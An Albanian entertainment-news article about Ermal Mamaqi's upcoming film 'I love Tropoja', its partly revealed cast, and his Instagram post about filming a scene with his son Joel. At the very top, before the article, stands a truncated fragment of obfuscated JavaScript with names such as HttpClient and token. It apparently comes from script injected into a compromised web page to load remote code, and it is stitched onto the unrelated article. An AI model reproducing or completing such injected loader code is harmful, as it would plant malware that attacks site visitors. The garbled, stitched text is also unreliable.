;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Në filmin e tij më të ri, Ermal Mamaqi ndan skenat e xhirimit me një person shumë të veçantë

By

Pas suksesit të filmit komedi dhe romancë “2 Gisht Mjaltë”, Ermal Mamaqit si duket i mbeti një shije e ëmbël për tu fokusuar ende më shumë në produksionin e filmave shqiptarë.

Aktori dhe producenti i njohur, do të sjellë shumë shpejt filmin e tij më të ri të titulluar “I love Tropoja”.

Deri tani, është zbuluar se pjesë e kastit të aktorëve do të jenë dy këngëtaret Enca Haxhia dhe Bleona Qereti, aktorja Arjola Demiraj, Uindi Haxhia, si dhe doktori i njohur i VIP-ave, Skerdi Faria.

Edhe pse nga kasta e aktorëve nuk janë zbuluar shumë emra, ai zbuloi një person shumë të veçantë me të cilin ndau skenat e xhirimit.

“Ditë me emocione dje… Momenti kur ndava skenën e xhirimit me djalin tim. Joel Mamaqi në filmin I ❤ Tropoja.” – shkroi ai në postimin e tij në Instagram ku ka ndarë një foto të tij dhe Joelit të shkëputur nga skenat e xhirimit.

Ermali dhe i biri i tij Joel do të kenë një skenë në filmin në fjalë, dhe do të jetë për ta gjithnjë një emocion i veçantë. / Prive.al

Artikuj të ngjashëm